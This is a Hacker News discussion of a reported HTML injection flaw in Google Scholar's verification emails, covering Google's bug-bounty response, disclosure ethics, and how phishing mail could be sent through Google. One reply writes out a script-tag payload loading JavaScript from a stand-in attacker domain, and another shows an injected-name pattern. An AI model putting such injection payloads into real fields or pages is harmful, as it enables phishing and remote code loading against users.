
Why you should not trust emails sent from Google - tomvangoethem
http://vagosec.org/2013/09/google-scholar-email-html-injection/
======
iamshs
Now compare this with the attitude of their Security researcher, Tavis
Ormandy, bashing Microsoft's lackadaisical approach towards fixing bugs and
has publicly published 0-days twice [1, 2, 3, 4]. Google only moved upon fear
of public disclosure, and that too inspite of researcher being meticulous and
patient.

Also, thank you Tom for your patience and being responsible. Also, I could not
find your name in Hall of Fame list.

[1] -
[http://www.computerworld.com/s/article/9239477/Google_engine...](http://www.computerworld.com/s/article/9239477/Google_engineer_bashes_Microsoft_s_handling_of_security_researchers_discloses_Windows_zero_day)

[2] - [http://www.zdnet.com/google-researcher-publishes-windows-
zer...](http://www.zdnet.com/google-researcher-publishes-windows-zero-day-
exploit-7000016403/)

[3] - [http://nakedsecurity.sophos.com/2010/06/15/tavis-ormandy-
ple...](http://nakedsecurity.sophos.com/2010/06/15/tavis-ormandy-pleased-
website-exploits-microsoft-zeroday/)

[4] -
[http://www.computerworld.com/s/article/9177948/Google_resear...](http://www.computerworld.com/s/article/9177948/Google_researcher_gives_Microsoft_5_days_to_fix_XP_zero_day_bug)?

~~~
lawnchair_larry
That was not done by a "Google Researcher". That was done by an independent
human who happens to also work at Google. And there are valid arguments in
favor of releasing 0day.

~~~
iamshs
And what about Google's dismissive attitude here? The same attitude that Tavis
got fed up of. The motive was to highlight just that. Tavis bashed MS because
he was riled up by their attitude, because maybe culture at Google was
different regarding patching critical bugs and moved fast. Well then, look no
further than Tom's post.

Tom was dealt with nearly same manner as Tavis says his ordeal was. Tavis
immediately went ahead with publishing the exploit, but Tom but gave them 2
weeks, even after persistently _demonstrating_ the criticality of the exploit.

Culture inside corporations is very different than outward facing one.
Facebook's behavior recently could be excused partly due to poor wording
(though onus was on FB), but what is the explanation here?

------
f-
Hey folks,

I am one of the co-founders of the Vulnerability Reward Program at Google.
It's one of the longest-running and most generous programs of this kind: since
2010, we have paid out around $1M in rewards for more than 1,500 qualifying
bug reports in web applications alone. We take great pride in keeping the
process responsive, friendly, and hassle-free.

Of course, it takes just one bad experience to undo much of that. Tom's report
is a valid issue. The reward panel - of which I am a member - decided that it
did not meet the bar for a financial reward. I stand by this decision, but I
think we should have been more forthcoming, precise, and responsive when
communicating that. In other words, I think we messed up.

PS. If you ever run into any problems of this type - or just want a friendly
soul to chat - please do not hesitate to poke me at lcamtuf@google.com :-)

~~~
schackbrian
Tom Van Goethem makes a strong case that this is a security vulnerability and
it does deserve an award. Can you explain why not?

~~~
f-
I think it's a valid security bug report.

We welcome all reports of security vulnerabilities, we try to fix them
quickly, and we credit the researchers - but we offer rewards only for higher-
impact flaws. You can check out this page for more info:

[http://www.google.com/about/appsecurity/reward-
program/](http://www.google.com/about/appsecurity/reward-program/)

In this context, phishing issues are tricky. Because many of our products
simply _have_ to do things such as displaying snippets of potentially
attacker-controlled text and multimedia, we try to evaluate phishing concerns
on a case-by-case basis. In essence, we ask ourselves how easy it would be to
exploit a particular behavior to mount a convincing attack.

My take on this bug is that the attack vector is severely constrained in well-
behaved e-mail clients; and that in badly-behaved clients, the existing
exposure is already considerably worse than any incremental hazard caused by
this flaw. It's valid and worth fixing - but does not quite meet the bar for
the reward tiers set up for higher-impact bugs.

~~~
dasil003
So chuck him a C note and move on. I don't think it's worth the bad PR to
quibble over what is clearly a security bug no matter how minor. HTML
injection is sort of like the bike shed of security vulnerabilities, every web
developer understands it, so you'll get a perverse amount of attention and
discussion on it.

~~~
f-
In essence, we have a reward structure that we think is internally consistent,
attracts the right sorts of research, and makes an optimal use of our
resources - and we try to apply it fairly.

Here, we handled the communications poorly, and I think it's OK to call us out
on that. In fact, I think it would be wrong to offer a reward in hopes of
buying silence from the reporter :-)

------
zmmmmm
No matter what he tried to explain they just kept replying that he didn't
qualify for the reward. It sounds like they have become super defensive about
acknowledging bugs because the reporter will immediately try to claim a
reward. If so, it's the exact opposite of the intent of the program.

I once reported Chrome because it crashed when I tried to load a 65536x65536
bitmap image. Since it was a crash I, of course, claimed it was a security
issue, in the hope that was enough to get a reward. Of course, they didn't
accept that, but it does make me think the other side of this issue may be
that Google is now receiving so many of these they are unable to properly
evaluate them all and applying the "HR" solution (employ someone
underqualified explicity to fob off as many people as possible so that only
super-qualified candidates get through).

~~~
justinschuh
I can assure you that Google takes VRP reports very seriously. Two members of
Google security (f- and adobkin) have provided context elsewhere in this
thread on the bug described in the post.

As for the Chrome report you mention, if you provide the bug ID I can check.
However, given your description, it definitely seems like the bug was closed
because you were observing the intended behavior of terminating the renderer
process on an out-of-memory condition. The bug reporting form links to
guidelines on reporting security bugs, and explains why this specific case is
not a security issue: [http://www.chromium.org/Home/chromium-
security/reporting-sec...](http://www.chromium.org/Home/chromium-
security/reporting-security-bugs#TOC-Signs-A-Crash-Is-Not-A-Security-Bug)

~~~
vog
_> As for the Chrome report you mention, if you provide the bug ID I can
check._

This demonstrates exactly what's wrong with Google's interpretation of
"openness". Sure, if one finds some Google insider, one may get information.
Normally (read: in almost all other bigger Free Software projects), one could
simply have a look at the bug tracker on one's own, without being on the mercy
of Google.

~~~
justinschuh
I asked for the bug ID so that I could verify it was triaged properly, not
because the report isn't public. Some reports (like security bugs) are
initially private, as is typical in any open source project. However, security
bug reports are made public as well at some after they're resolved.

You can go ahead and see for yourself:
[https://code.google.com/p/chromium/issues/list](https://code.google.com/p/chromium/issues/list)

~~~
mpyne
For example, the KDE security mailing list is _definitely_ private, and some
KDE bugtracker bugs are private as well.

------
kevingadd
Arbitrary content injection into signed emails from Google, and it's not a
security risk??? Incredibly poor response from them. Props to the author for
being patient and trying multiple times to convince them to actually fix it.

~~~
oakwhiz
It's too bad that Google decided that he didn't deserve compensation for
reporting this security vulnerability.

~~~
Zoomla
start a crowd-funded reward like reported at
[http://www.theinquirer.net/inquirer/news/2290380/crowdfunded...](http://www.theinquirer.net/inquirer/news/2290380/crowdfunded-
reward-lined-up-for-zuckerberg-s-facebook-wall-hacker)

~~~
icebraining
I'd rather pressure Google into delivering on their promise. But then again, I
don't use Gmail.

~~~
thedufer
What does Gmail have to do with it? It was the way Google Scholar was building
emails that was at fault, right?

~~~
icebraining
Right. And Google Scholar is part of Google.

------
roel_v
Here's an honest question: why do people still bother with the 'responsible
disclosure' nonsense? What's in it for them? Days of work, weeks of waiting
and frustration, for a 'mention' in some imaginary 'hall of fame'? $1mm over
1500 bugs, that's $666 / bug. That's about a day worth of work if your rates
are low and you are in a low CoL area, or half a day or less if you work for
Google.

I take it that people who find these vulns do it for fun, even if it's their
job - if you don't have a contract to start looking for issues, there is no
reason to do so other than fun. So the only reason people bother with
'responsible disclosure' is, as far as I can tell, because not doing so would
damage their public persona. But it only got to that point because big vendors
pushed the moral superiority of 'responsible disclosure' on us over the last
decade. Back in the 1990's (when I was last sort of active in the scene),
nobody would think of giving vendors weeks or months of time to fix their own
damned bugs - if your PoC exploit worked at 3am (with real, working shell
code, none of that 'call ::MessageBox(NULL, "U got 0wned") nonsense), you'd
post it to bugtraq at 3:15 so that you could see the responses when you got
out of bed in the morning.

~~~
probably_wrong
I think it's fairly simple: if you get Google to accept that there's indeed a
problem, they'll fix it and 100% of the possible victims of this exploit are
now safe. If you disclose it non-responsibly, you are letting a pretty big
crowd know there's a problem, while leaving a time window open for them to
exploit it and pretty much assuring that someone will get "0wned". By
disclosing responsibly, you are making sure that the least possible number of
users are affected.

It's not about the hall of fame. Is about making the web a safer place.

~~~
roel_v
Okay, maybe it says something about me as a person, but I can't quite
understand that as a reason. I mean, I understand why people volunteer at a
soup kitchen, but not this. Why would somebody go out to protect some unknown
people on the internet from the mistakes of a for-profit company that is
probably screwing over those same people, and themselves, in 100 other ways?
I'm not anti-corporations or anything like that, but I do recognize that they
are looking out for themselves (as is their right), I don't understand why
everybody who deals with them in some way or another doesn't do that, too.

Plus - the fastest way of getting a vuln fixed is by having it out in the
open, hopefully in a way so public that the affected companies' PR department
needs to get involved. That at least incentivizes them to proactively look for
issues, rather than set up a security@ alias, hire some well-known names from
the scene to fix issues send there and calm the pocket protector crowd when
shit hits the fan ( _cough_ , ctrl-f this page for examples), and pay
reporters a fraction of the market value of their work (if anything at all).

~~~
nostrademons
I suspect that for most security bugfinders, the people they are protecting
are not the giant corporations, it's the grandmas whose computers will be
pwned within about a day or two of a 0-day hitting the open market. The number
of people who read security blogs is miniscule compared to the number of
people who use products with security flaws. You are not going to convince
most of the latter to read vulnerabilities, but they're the ones who get hurt
when a bug makes it out into the open unreported.

------
jrochkind1
Maybe they can justify thinking it wasn't really a security vulnerability, or
maybe they can say, hey, everyone makes mistakes, we didn't realize it was a
security vulnerability.

But what the heck is the justification for deciding it's a security
vulnerability that needs to be fixed only when the guy says he's going to
advertise it publicaly? What the hell is that?

If he had sold it privately, without telling Google, instead of letting them
know he'd be advertising it publicly -- then it still wouldn't be worth
fixing?

~~~
iamshs
This peeved me much too, as everybody in my lab, infact the whole research
floor has Google Scholar accounts including my professor. Phishing of
researchers through an email officially sent by Google, to researchers
official emails would have had repercussions. Excerpts from the email exchange
described in the article:

1\. Additionally, as you said you can register google-scholar.com and phish
from there as well.

Yes you can do it that way too, but now the link to that domain would have
been provided through a Google sanctioned email. Driving traffic to that
domain alone vs. from an phishing email through author's vulnerability would
have different impact.

2\. we do not believe that there is a security sensitive change that needs to
be done here.

Wow. Security researchers at Corporations professionally working to secure
products. This vulnerability was passed onto Kevin after being vetted by
Aleksandr. Maybe the team works on more potent vulnerabilities.

~~~
mathias
Some more points:

3\. Since these emails are sent by the Google Scholar back-end, through
Google’s legitimate servers, such a phishing mail would be more likely to
bypass email client spam filters (compared to, say, an attacker registering
google-scholar-hax.net and sending phishing emails from there).

4\. The affected emails would still have Google’s DKIM email signature,
proving that it was sent by Google (which would be impossible from a custom
attacker-controlled domain). In other words, an attacker could send an email
containing any HTML he wants, to any academic email address, and Google still
puts a stamp on it saying “this is legit”.

------
kintamanimatt
I don't understand this pervasive mentality among companies that run such a
cash-for-bugs scheme. Isn't the idea to encourage people to properly report
bugs by rewarding them financially, thereby discouraging them from selling the
details to the highest unrelated bidder?

All Google is doing is damaging its reputation.

------
turing
I definitely commend the author for his work, but I think that there might
have been a slight misunderstanding here. In his last email, the author talks
about how public disclosure would "force" Google to fix the vulnerability. But
I read Google's response as simply saying that they did not think the bug
qualified for the program, not that they didn't intend to fix it. Then again,
my reading is definitely influenced by my time at Google and how seriously my
team took this sort of thing.

~~~
iamshs
"we do not believe that there is a security sensitive change that needs to be
done here." \- Google's Kevin.

I think this means Kevin said they are not going to change the code on their
end.

Also, author stated: "Even if this vulnerability doesn’t qualify for a reward,
I strongly believe that it should be fixed promptly to protect end users."

Do I read the intent behind this correctly. Please do correct me. Because, to
be frank, me and labmate are peeved right now about this. Google Scholar is a
functional way to spread awareness about own research, but Google's response
got on my nerves pretty badly.

~~~
turing
I think that quote could also be interpreted as saying that Google simply
didn't see it as a change that qualified for the program, not that they
weren't planning on fixing it. But again, I could be entirely wrong; I have no
experience with either the team or the program. I just have a hard time
imagining any of the engineers that I know there getting assigned a bug like
this and clicking 'working as intended - will not fix'.

~~~
iamshs
Then I would ask why is this vulnerability not up for monetary compensation?

[http://www.google.ca/about/appsecurity/reward-
program/](http://www.google.ca/about/appsecurity/reward-program/)

It is a script that allows one to control behavior (even though in a limited
way, but yet authentic way) of Google's web property.

Why did they say that this was not a security sensitive issue? And why did the
tone change upon seeing public disclosure looming?

Anyways, I am not happy about handling of this situation. Good on Tom for
being responsible, and the exploit did not wander into irresponsible hands.
Because, within a day everybody on Google Scholar would have got this
exploitable email.

------
r0bbbo
I think I might be missing something - as a Google service user, I'd have to
update my own name to be Mr Test<!--BAD STUFF HERE in order to perform a
phishing attack on myself?

~~~
pudquick
What you're missing is that the email was generated and sent by Google to the
new email address that the author of the article was changing his account to -
and this email was the one that he was able to inject arbitrary HTML content
into it, including a link to a third-party domain.

He could have entered _ANY_ email address into the "change my email to" form -
and Google would send an email there.

With suitable preparation work on his profile name, he could essentially have
Google send a custom crafted HTML email to his intended victim - complete with
verified domain sender information (and hiding the actual 'click here to
verify your email' link so that the email address never actually gets
changed).

Getting Google to send phishing emails on your behalf is a pretty big deal.

~~~
prawn
Chinese spammers are abusing Picasa galleries to spam people now. Couldn't
find a way to report that and never heard back from them on Twitter. Marking
the emails as spam doesn't stop more making it through. (Actually, marking as
spam seems to do SFA.)

~~~
coolnow
I just got spam via a Google calendar event. Basic 419, location in Syria and
lots of weapons and money was involved. Followed the link through Sandboxie,
ended up actually at Google Calendar, marked as spam and went on with my day.

------
cryptbe
Wow. Give me a break, please. What the OP reported was a super minor issue,
and he's already got what he deserves.

His bug allowed him to inject links into verification emails sent by Google
Scholar. He claimed that he could inject CSS links too, but that didn't make
this problem any worse. Why? Because it's up to mail clients to load the
linked CSS stylesheets or not. Gmail, for example, would never load those
remote CSS files. If your webmail client does that, it's time to switch to a
better one.

So he could inject links, which is annoying, but still a very minor issue. It
may make phishing a bit easier, but you know what phishing has always worked
against average Joe if you try hard enough. That means that this problem
doesn't really give an attacker any advantages that he couldn't do by himself.

Disclaimer: I'm a member of the team that handles VRP.

~~~
crygin
> If your webmail client does that, it's time to switch to a better one.

Academic users constitute an audience that's quite often bound to use a
single, potentially-outdated webmail system. In our experience,
academic/University users are utilizing what we consider "nonstandard" email
systems with an order of magnitude more regularity than nonacademic users. You
may wish to better understand the audience of the product before asserting
that they should "switch".

And claiming something is not a security issue because you're trusting a
client you don't control to behave well is naive at best, and apologist at
worst. It's genuinely upsetting to hear coming from someone who classifies
vulnerabilities.

~~~
cryptbe
I didn't say that I trust mail clients. I said mail clients shouldn't accept
arbitrary HTML markups and tags in emails. That's a serious problem that
needed to be addressed, regardless of Google Scholar being exploited to send
emails with arbitrary links or not.

~~~
yinso
The onus is still on Google - the rule of the web is that any clients that one
allows connections from are fair games that one has to address.

~~~
Nitramp
If you were using an email client that executes arbitrary HTML, you'd be owned
since a long time anyway. That'd like using a browser that doesn't have any
cross domain security boundary - it's just not a realistic attack vector,
these things don't exist - or do you know an email client that actually
interprets JS?

~~~
yinso
You don't need to execute JS in order to phish, as the original link alludes
to with the html comment trick.

This particular comment thread was mostly about webmail clients. But to your
specific question... take a look at the link for an incomplete list of email
clients that runs JS

[http://en.wikipedia.org/wiki/Comparison_of_email_clients#Tem...](http://en.wikipedia.org/wiki/Comparison_of_email_clients#Templates.2C_scripts_and_programming_languages)

------
benatkin
I don't see the author's name in the linked Honorable Mentions page. Did
someone from Google pull it because they didn't like this blog post? Searched
for "tom", "Mathias", and "vago". No recent results for any of these search
terms.

~~~
tomvangoethem
I was expecting them to put my name up there by the time I posted the blog,
should be there in the near future though...

~~~
frozenport
Yes, but you also expected them to pay more attention to your exploit?

~~~
benatkin
He's there now. Apparently they did a bulk update. It went from having 0
people named Tom on the whole page to having two people named Tom!
[https://www.google.com/about/appsecurity/hall-of-
fame/distin...](https://www.google.com/about/appsecurity/hall-of-
fame/distinction/)

------
moloch
You should not trust emails.

~~~
kamjam
I thought it was going to be about emails sent through GMail, but good catch
and well done to Tom.

------
thrownaway2424
It looks like your options for formatting the content are pretty limited and
you can't change the subject line nor the preamble about Google Scholar, so
you wouldn't be able to, say, masquerade as a password recovery email or
anything like that. Still, I personally feel like any content injection should
be treated seriously.

~~~
tomvangoethem
I agree on the subject line (which is "Verify your email address") and that
the mail is sent from "Google Scholar Citations", but as it was possible to
include arbitrary CSS files, the content could be changed to pretty much
anything... Although there was a length-restriction on the user's name, there
were two other fields that weren't escaped properly and thus could be used to
insert more HTML-content.

~~~
smtddr
_> Although there was a length-restriction on the user's name_

As long as any field allows enough chars to:

<script
src="[http://evilbadpersondomain.com/forTheLulz.js"></script>](http://evilbadpersondomain.com/forTheLulz.js"></script>)

....anything is possible from there.

~~~
RKearney
There are email clients that execute JavaScript?

~~~
smtddr
Ah, yeah smartphone and desktop apps don't do js(afaik) - but the web-browser
access is still big. If gmail's web interface went down for a day, I think a
lot of people would notice.

~~~
nitrogen
Gmail doesn't run JavaScript in e-mails, though.

~~~
tictac
I am not sure - when you post enough js-code into a gmail compose "window" it
will crash.

~~~
nitrogen
My guess: the WYSIWYG editor uses its own HTML parser and filter, written in
JavaScript, that has some O(n^ _terrible_ ) corner case that your paste test
is hitting.

------
wahsd
Re. current discussions of security and code review because of NSA and other
government entities corrupting standards. If Google and Facebook cannot find
such simple errors and then even balk at implementing a fix, which turns out
to reveal an even larger flaw, what hope is there.

